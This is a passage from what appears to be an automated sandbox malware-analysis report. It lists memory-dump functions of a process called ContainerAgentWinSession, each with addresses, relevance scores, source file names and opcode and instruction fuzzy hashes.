                                • Opcode Fuzzy Hash: c0c7d8910fa8edb013cf39d84e77962b63d23f5184028abda98529c5d3d5d0f8
                                • Instruction Fuzzy Hash: 3CD0C930D0C5568FEA49BA489841AAD33A1FF45389F004475ED4E9318BDF38A8528A59
                                Function 00007FF848E806A5 Relevance: .0, Instructions: 13COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction ID: 773e045d4ae15082dc567967975dcfd9c5073a4b0737c160e12d86301ae84c87
                                • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction Fuzzy Hash: FDC04C06D5E91F09F455B16E54460ACA1407FD56D0FE50172D51C424D1DE7D20D6516E
                                Function 00007FF848E812D8 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction ID: dcc0d68abf5b0b3c2ab49b597791ffbcf23c0c5793d40d8cd22d28b5fe74732b
                                • Opcode Fuzzy Hash: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction Fuzzy Hash: F9C04C345558098FC948FB29D88591877A0FF19215BD601D0E409C7171E669DCD5D745
                                Function 00007FF848E835AD Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 67270f9e8fa3c4d48be0e5481c0d2ce4387f72774a47408615ccb5a0ae4f2cf0
                                • Instruction ID: 27af6f9c79864d18f9571dfceabc1be7fa2ddb863be8d312eadfea79a3506f9c
                                • Opcode Fuzzy Hash: 67270f9e8fa3c4d48be0e5481c0d2ce4387f72774a47408615ccb5a0ae4f2cf0
                                • Instruction Fuzzy Hash: 0FC08C06E0DC2E9AE2552214042027E0002DF807A5F985071E00E872CACE2C190106CA
                                Function 00007FF848E806C8 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction ID: 523bdebfd329f9494f4a36e86845b5334741e8ba2daeaf6a0f0b7ecea0633d04
                                • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction Fuzzy Hash: 19B01200C5E40F04E40431BA08420AC70407FC4180FC10070D40C41081D97D1095025A

                                Non-executed Functions

                                Function 00007FF848E809B0 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID: c9$!k9$"s9$#{9
                                • API String ID: 0-1692736845
                                • Opcode ID: 1faa08c920c1acac1da93e729ba170363ce50425dd1c15349f3f3d149fc2acff
                                • Instruction ID: 7dbab12ab344c891487e757cc4c1567e384ca26d8ebe423f1814e492fe212c8d
                                • Opcode Fuzzy Hash: 1faa08c920c1acac1da93e729ba170363ce50425dd1c15349f3f3d149fc2acff
                                • Instruction Fuzzy Hash: 98413ED6ACE86A7DE21D36BDB4111FD6B44EF812B5F4C93B7E04C891838E18608586FD

                                Executed Functions

                                Function 00007FF848E90D48 Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5X_H
                                • API String ID: 0-3241812158
                                • Opcode ID: 0c0d057e39080d4add7ff9c1d753e96d389753600744579cb700e0f8b0673fa0
                                • Instruction ID: 16899758a98e559d4a67e18dc6f0a805de54326afa3a5010b878c60a646329dd
                                • Opcode Fuzzy Hash: 0c0d057e39080d4add7ff9c1d753e96d389753600744579cb700e0f8b0673fa0
                                • Instruction Fuzzy Hash: 1C910071D1CA898FE789EB68986A3B87FE0FF56358F4400BAC009D72D2DBB91805C701
                                Function 00007FF848EA10AF Relevance: 1.3, Instructions: 1316COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848ea0000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 540affa0ea4dc2612f72f5c241e5d2e0bbb34520ba8f05bd70a0e7a5e9cb53aa
                                • Instruction ID: c4680b0d96f801b3ea55da5ff1d71fe4070837c9a918944771f16fed1011b02e
                                • Opcode Fuzzy Hash: 540affa0ea4dc2612f72f5c241e5d2e0bbb34520ba8f05bd70a0e7a5e9cb53aa
                                • Instruction Fuzzy Hash: E2928130E1C95A9FEA98FA2894557B973E2FF58790F1445B9D00ED3283DF38AC828745
                                Function 00007FF848EA1290 Relevance: 1.3, Instructions: 1251COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848ea0000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f31e7c6e74bba338585f9f5ee14ac14dc6222304488bc8136fda25ef5264f636
                                • Instruction ID: dcd78ab7aa28fe75e8f6c4a9ec84c2f4d7c29327fb76c36f620c7461be3f1447
                                • Opcode Fuzzy Hash: f31e7c6e74bba338585f9f5ee14ac14dc6222304488bc8136fda25ef5264f636
                                • Instruction Fuzzy Hash: 19929120E1CA5A9FEB98FA28945577973E2FF98780F0401B9D40ED3283DF39AC428745
                                Function 00007FF848E90E43 Relevance: .2, Instructions: 173COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d39eb5d91c397d6c08424ab725c4320dec61c41a3dc970db9fdf9a0631656637
                                • Instruction ID: 8ca92a0080c269fc946d06d3982a787f14aa90d51c015bd35f098f046b3d7605
                                • Opcode Fuzzy Hash: d39eb5d91c397d6c08424ab725c4320dec61c41a3dc970db9fdf9a0631656637
                                • Instruction Fuzzy Hash: A151C171A18A999EE78CEB6C98597B97FE0FB4A368F8001BEC009D33D1DBB51411C744
                                Function 00007FF848E90908 Relevance: .1, Instructions: 118COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction ID: b4f9bfcc1c1dbd69ca597215f88b331fe7fe4d34ce35816be2a24c0538839b68
                                • Opcode Fuzzy Hash: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction Fuzzy Hash: 4821EA3170CC194FD768EA5CE889DB973D1FF9932170501BAE58EC7125E961EC8287C5
                                Function 00007FF848E90998 Relevance: .1, Instructions: 96COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4d0029b8a88a5f2d1b58671db7e17e7946d48b80172cfabbddc7fb2375f209a5
                                • Instruction ID: f35b66253e74419289246a1ffe22716f762fc90c01a59a2174065cda1c7285f2
                                • Opcode Fuzzy Hash: 4d0029b8a88a5f2d1b58671db7e17e7946d48b80172cfabbddc7fb2375f209a5
                                • Instruction Fuzzy Hash: B6213321B1C9195FE788B76D905A67976C6EF99754F1100FAE80EC32E7DE28AC428284
                                Function 00007FF848E9116D Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f6504a51e96e62120960d4d96a6bbc8ef653c6433098c69e7f7cb2a23f905172
                                • Instruction ID: ab42608eb247fca66ac9a73fff6c0914e112348f826741354ff9da82e3e44a85
                                • Opcode Fuzzy Hash: f6504a51e96e62120960d4d96a6bbc8ef653c6433098c69e7f7cb2a23f905172
                                • Instruction Fuzzy Hash: 6931C231A0C54A8FEB45FB68C854AF97BF0FF26340F0501BAC009D7292DB78A941CB50
                                Function 00007FF848E90C25 Relevance: .1, Instructions: 84COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 708fd598c065309b6541ab05387ea6579458b0a2b96279e759eeba44057c0858
                                • Instruction ID: 00d6a7c14118ac430a6604ed35b7cdd95eb0fb2f73c0584fd6f1d0f02ca34c5c
                                • Opcode Fuzzy Hash: 708fd598c065309b6541ab05387ea6579458b0a2b96279e759eeba44057c0858
                                • Instruction Fuzzy Hash: 05214B36A0D649AFE716B7B8D8010EC7B60FF423A4F4881B3C0088B1D3DB78254AC799
                                Function 00007FF848E908F8 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction ID: cf38bec96cb45d447ad1078e5236fba8e43c672cd2e68cf8dd23c29f6f354312
                                • Opcode Fuzzy Hash: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction Fuzzy Hash: 6F01FC31F0D91D0F9568E15E944A93673C2E7C6674B191279D84FC3255DEA0AC5342C4
                                Function 00007FF848E96AC4 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ae12b7e2b868559d4d81e4f8997f00a724f3b2562fb06c533224dfc14a49a05c
                                • Instruction ID: abcbeed49c9a08905f85b239b78b10696e3ad6a4e2178ba54844125f7a23be06
                                • Opcode Fuzzy Hash: ae12b7e2b868559d4d81e4f8997f00a724f3b2562fb06c533224dfc14a49a05c
                                • Instruction Fuzzy Hash: E021FC30D4852DCFDBA9EB04C495BAAB3B1FB58355F1145BAC00EA32A0DBB5ADC0CB45
                                Function 00007FF848E96E49 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 98c523b8f1873f0f22a0215bb4d789fa2c12d02fb302244c6824da7ca48c6758
                                • Instruction ID: a5afc071eb8ea933c79c34be485dade9cab965e5d2b751f2c38f04215e4db5f2
                                • Opcode Fuzzy Hash: 98c523b8f1873f0f22a0215bb4d789fa2c12d02fb302244c6824da7ca48c6758
                                • Instruction Fuzzy Hash: 98118620D1C509CFEBA4F698D8466F873E1FF58384F4001BAD84ED32A2EF786D40468A
                                Function 00007FF848E90C38 Relevance: .1, Instructions: 55COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: decf81c4f982908bcc34f923b849cc09361c72faca74904887ed8a0f23aaf13d
                                • Instruction ID: 26f42adde0ec78df75b34a737ac428a8f5318236501f5cf9abfc03128a487b2b
                                • Opcode Fuzzy Hash: decf81c4f982908bcc34f923b849cc09361c72faca74904887ed8a0f23aaf13d
                                • Instruction Fuzzy Hash: 3E11C231A0D7899FE702FBB888551AC7BB0FF42394F5544F7C044DB2A2D6781649CB95
                                Function 00007FF848E90C40 Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4d2618250addc08769adf86ee29ab295a5e2dc34272934cd9fc2a2b0e315111c
                                • Instruction ID: 37ee0b4aec60d2667a370f72349aef8808cfdad5a951eea69653529b7930b41e
                                • Opcode Fuzzy Hash: 4d2618250addc08769adf86ee29ab295a5e2dc34272934cd9fc2a2b0e315111c
                                • Instruction Fuzzy Hash: BF11AD31A0D7899FE706FBB888550AC7FB0FF42394F5541F6C044DB2A2D6782A49CB95
                                Function 00007FF848E90C48 Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 09ddbb158f2b8f4bc2322e2d7f9fd1fc0969d01b76312e455351d8522a9537c7
                                • Instruction ID: a815f573088b94aee8fb7e34eba6de2f4270d9db5fa6abb580fa19fa32bb54a6
                                • Opcode Fuzzy Hash: 09ddbb158f2b8f4bc2322e2d7f9fd1fc0969d01b76312e455351d8522a9537c7
                                • Instruction Fuzzy Hash: 2A019E3190D7899FE706FBB8C84409CBFB0FF42344F5541E6C044DB2A2D6786A48CB81
                                Function 00007FF848E96EA1 Relevance: .0, Instructions: 39COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 27c15ce4a1c331bc52fe54e80a11c8f78838364ee69a8bbe2f5e17b3e25e5991
                                • Instruction ID: a3a730465b57ca93d00eb2eeaf05a0ac215576db5125c87a37cc47e96af3835d
                                • Opcode Fuzzy Hash: 27c15ce4a1c331bc52fe54e80a11c8f78838364ee69a8bbe2f5e17b3e25e5991
                                • Instruction Fuzzy Hash: 1D016D3091C40ACEEFA4FA58D8957F873A0FB54344F5000BAC44EC32A2DEB82A858B09
                                Function 00007FF848E90C50 Relevance: .0, Instructions: 38COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef398adeb80fbd3785f66ec4de651f706265fc963689c4077fc2c0da828842a3
                                • Instruction ID: 07c0158dbfeedd7d846d936881780579ff7598f1786c0300fe9fa27aca73a833
                                • Opcode Fuzzy Hash: ef398adeb80fbd3785f66ec4de651f706265fc963689c4077fc2c0da828842a3
                                • Instruction Fuzzy Hash: 8C018F30D0D789AFE706FBB488540ACBFB0FF02348F5441E6C044DB296DA785A44CB45
                                Function 00007FF848E96FA8 Relevance: .0, Instructions: 34COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cb65897aef3bebfaa9c3501a957d9e020c54da186a0abb5acc78b9748c16a7cf
                                • Instruction ID: f8432b74ead5a7877dfd752adb44d66d366229f281a06000a9111252e54894ab
                                • Opcode Fuzzy Hash: cb65897aef3bebfaa9c3501a957d9e020c54da186a0abb5acc78b9748c16a7cf
                                • Instruction Fuzzy Hash: 53F0302191C409CEEBA4FA98D4856F833A1FF54385F5001BAD84DD32A2DEB86E55864D
                                Function 00007FF848EA44B0 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848ea0000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f8aee1f01afb7259a6f8a3a92e9ff05adf4951edcf3ef82aae489cf706a4ad5b
                                • Instruction ID: 59b63b6d692294d10372b8ec1eb32d88dd7697d93a12fbe2720bea99921e60e6
                                • Opcode Fuzzy Hash: f8aee1f01afb7259a6f8a3a92e9ff05adf4951edcf3ef82aae489cf706a4ad5b
                                • Instruction Fuzzy Hash: BCF0BE30E0D60B8FEB48EB98C4505FEB7B0FF40741F00023AC00AD2288DF3469008B94
                                Function 00007FF848E9526D Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction ID: 4874c647f61bfd1c0424b24d179a3e7ae5a382ffad72da176d1e385fb71cf967
                                • Opcode Fuzzy Hash: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction Fuzzy Hash: 8BE0E531E0D0068EF760BAD8D0003BD22A5AF84388F550079D92DE72C6CF7AAC418648
                                Function 00007FF848E90B92 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6c56228407230d6c202e65f249f4463cb1669881550548cb6ff8199dd53ba4d0
                                • Instruction ID: 21ab46c16fe935fe7c15a2c90f176bb495fb89a0ab9f77a9ed343c6db9de258b
                                • Opcode Fuzzy Hash: 6c56228407230d6c202e65f249f4463cb1669881550548cb6ff8199dd53ba4d0
                                • Instruction Fuzzy Hash: B5D0A73195E98B8FE785B778DC95894BFA0FF1F314B8910D6D04CC72A2E6954898C701
                                Function 00007FF848E90D30 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction ID: e65d8228638dd825b5de3031fc224d67e4a94078b2cdfd46187ec1436de23706
                                • Opcode Fuzzy Hash: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction Fuzzy Hash: A4E01234A0C20ADFE700FB94C4846AD7761FB51355F504265D41187289DBB86684C684
                                Function 00007FF848EA4CA3 Relevance: .0, Instructions: 14COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848ea0000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c0c7d8910fa8edb013cf39d84e77962b63d23f5184028abda98529c5d3d5d0f8
                                • Instruction ID: 3d90096790b864152a8fa73a9ee40d690075b896381298a92a5de2785ea278bc
                                • Opcode Fuzzy Hash: c0c7d8910fa8edb013cf39d84e77962b63d23f5184028abda98529c5d3d5d0f8
                                • Instruction Fuzzy Hash: 97D0C930D0C656CFEA49BA489841ABA33A1FF45789F014475EE4E83187CF78A8528A59
                                Function 00007FF848E906A5 Relevance: .0, Instructions: 13COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction ID: 7dfd813d5a94c95751d53650d402260dc67e6a49cb757f27893adb77e58464f3
                                • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction Fuzzy Hash: 68C04C06D5E52F09F455B1EE54460ECA1407FD96D8FD50172D51C404C29FED20D5415E
                                Function 00007FF848E912D8 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction ID: b85895e8883aa790b9a0407e17e5c415c608bc80569033a9909c8476f139b02a
                                • Opcode Fuzzy Hash: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction Fuzzy Hash: 55C08C304108088FC908FB28C88480433A0FF09204BC60090E009C7170E269DCC1C740
                                Function 00007FF848E935AD Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3514fb73090f54411ec2e4c5b980e00dc3919ddcb982139615160a9feadec1cc
                                • Instruction ID: 82944565f12b27d237013527cf1352980e06f5d6aeda658ecc7ae7aed7ac0bd2
                                • Opcode Fuzzy Hash: 3514fb73090f54411ec2e4c5b980e00dc3919ddcb982139615160a9feadec1cc
                                • Instruction Fuzzy Hash: 64C04C06E1DC2A9AE2596254542127E0846DF84799F985075E40E872CADF5D5A0146CA
                                Function 00007FF848E906C8 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction ID: 381b4269f8b35b75fbeebd4794d7e36e47f11862b5f9ffc51a323fd9870811af
                                • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction Fuzzy Hash: 04B01201C6E40F04E41431FA08420E870407BC8188FC10070D80C4008199DD1094024A

                                Non-executed Functions

                                Function 00007FF848E909B0 Relevance: 5.2, Strings: 4, Instructions: 178COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000002A.00000002.2533583387.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_42_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID: c9$!k9$"s9$#{9
                                • API String ID: 0-1692736845
                                • Opcode ID: 696e16831c8a0c83608f077f1dc9b33155f26f3f6961ca39a436cafc05629c30
                                • Instruction ID: 4993736fcc240f919cad4a1a215fb278bf0b637f79f1f0cf1f8c5c920ef11074
                                • Opcode Fuzzy Hash: 696e16831c8a0c83608f077f1dc9b33155f26f3f6961ca39a436cafc05629c30
                                • Instruction Fuzzy Hash: 66419ED2ACA9633DE10E36FDB4020F96B44EF813B9F4C9677E04C890938F59608586F9

                                Executed Functions

                                Function 00007FF848E50D48 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
